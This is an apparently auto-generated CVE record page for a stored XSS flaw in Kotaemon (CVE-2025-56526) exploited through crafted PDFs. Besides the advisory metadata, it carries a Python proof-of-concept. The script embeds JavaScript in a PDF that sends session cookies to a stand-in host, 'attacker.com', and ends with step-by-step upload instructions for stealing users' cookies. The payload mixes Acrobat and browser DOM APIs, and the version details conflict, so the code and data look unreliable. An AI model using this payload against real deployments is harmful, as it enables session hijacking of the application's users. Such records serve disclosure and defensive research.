Security Vulnerability Report
CVE-2025-56526 CVSS 6.1 MEDIUM

CVE-2025-56526

Published: 2025-11-18 17:16:04
Last Modified: 2025-12-02 19:35:46

Description

Cross site scripting (XSS) vulnerability in Kotaemon 0.11.0 allowing attackers to execute arbitrary code via a crafted PDF.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:cinnamon:kotaemon:*:*:*:*:*:*:*:* - VULNERABLE
Kotaemon < 0.11.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
'''
CVE-2025-56526 PoC - Kotaemon PDF XSS Vulnerability

This PoC demonstrates how to create a malicious PDF with embedded JavaScript
that will execute when opened in Kotaemon application.
'''
from pypdf import PdfWriter, PageObject
from pypdf.generic import DictionaryObject, NameObject, TextStringObject


def create_malicious_pdf(output_path):
    """
    Create a malicious PDF with embedded JavaScript for XSS attack
    """
    # Create a new PDF
    writer = PdfWriter()

    # Add a simple page
    page = PageObject.create_blank_page(width=612, height=792)
    writer.add_page(page)

    # Add JavaScript action to the PDF
    # This JavaScript will execute when the PDF is opened
    malicious_js = """
    app.alert('XSS Payload Executed!\\nStealing cookies: ' + document.cookie);
    // Attempt to steal sensitive data
    try {
        var img = document.createElement('img');
        img.src = 'http://attacker.com/steal?c=' + encodeURIComponent(document.cookie);
        document.body.appendChild(img);
    } catch(e) {}
    """

    # Add the JavaScript action
    # Using catalog dictionary to add OpenAction
    writer.add_js(malicious_js)

    # Write the malicious PDF
    with open(output_path, 'wb') as f:
        writer.write(f)

    print(f"Malicious PDF created: {output_path}")
    print("Upload this PDF to Kotaemon to trigger the XSS vulnerability")


# Alternative: Create PDF with JavaScript in document-level scripts
def create_malicious_pdf_alt(output_path):
    """
    Alternative method using document actions
    """
    writer = PdfWriter()

    # Create page
    page = PageObject.create_blank_page(width=612, height=792)
    writer.add_page(page)

    # Add JavaScript via catalog OpenAction
    js_action = DictionaryObject()
    js_action[NameObject('/S')] = NameObject('/JavaScript')
    js_action[NameObject('/JS')] = TextStringObject(
        'app.alert("CVE-2025-56526 XSS - Cookie Theft: " + document.cookie);'
    )

    # Set OpenAction in catalog (uses a private pypdf attribute)
    writer._root_object[NameObject('/OpenAction')] = js_action

    with open(output_path, 'wb') as f:
        writer.write(f)


if __name__ == '__main__':
    create_malicious_pdf('malicious_cve_2025_56526.pdf')
    print("\nPoC instructions:")
    print("1. Generate the malicious PDF using this script")
    print("2. Upload the PDF to Kotaemon application")
    print("3. When users view the PDF, the JavaScript will execute")
    print("4. Attacker's server will receive stolen session cookies")
```

References

- https://github.com/Cinnamon/kotaemon (Product)
- https://github.com/Cinnamon/kotaemon/commit/37cdc28 (Patch)
- https://github.com/HanTul/Kotaemon-CVE-2025-56526-56527-disclosure (Exploit, Third Party Advisory)
- https://harvest-sink-590.notion.site/Stored-XSS-via-Unsanitized-PDF-Content-Rendering-and-Plaintext-Credential-Exposure-in-LocalStorage-236770c3fe1e80f6a1aef381fb1c8f73 (Exploit, Third Party Advisory)
- https://skinny-exoplanet-584.notion.site/Stored-XSS-via-Unsanitized-PDF-Content-Rendering-and-Plaintext-Credential-Exposure-in-LocalStorage-22cd1563bd3380458588eb49f361a363 (Exploit, Third Party Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-56526",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-18T17:16:04.477",
    "lastModified": "2025-12-02T19:35:45.867",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "Cross site scripting (XSS) vulnerability in Kotaemon 0.11.0 allowing attackers to execute arbitrary code via a crafted PDF."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}
    ],
    "configurations": [
      {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:cinnamon:kotaemon:*:*:*:*:*:*:*:*", "versionEndIncluding": "0.11.0", "matchCriteriaId": "3A364AA3-7EC9-49E9-AF67-F3E649361780"}]}]}
    ],
    "references": [
      {"url": "https://github.com/Cinnamon/kotaemon", "source": "[email protected]", "tags": ["Product"]},
      {"url": "https://github.com/Cinnamon/kotaemon/commit/37cdc28", "source": "[email protected]", "tags": ["Patch"]},
      {"url": "https://github.com/HanTul/Kotaemon-CVE-2025-56526-56527-disclosure", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]},
      {"url": "https://harvest-sink-590.notion.site/Stored-XSS-via-Unsanitized-PDF-Content-Rendering-and-Plaintext-Credential-Exposure-in-LocalStorage-236770c3fe1e80f6a1aef381fb1c8f73", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]},
      {"url": "https://skinny-exoplanet-584.notion.site/Stored-XSS-via-Unsanitized-PDF-Content-Rendering-and-Plaintext-Credential-Exposure-in-LocalStorage-22cd1563bd3380458588eb49f361a363", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}
    ]
  }
}
```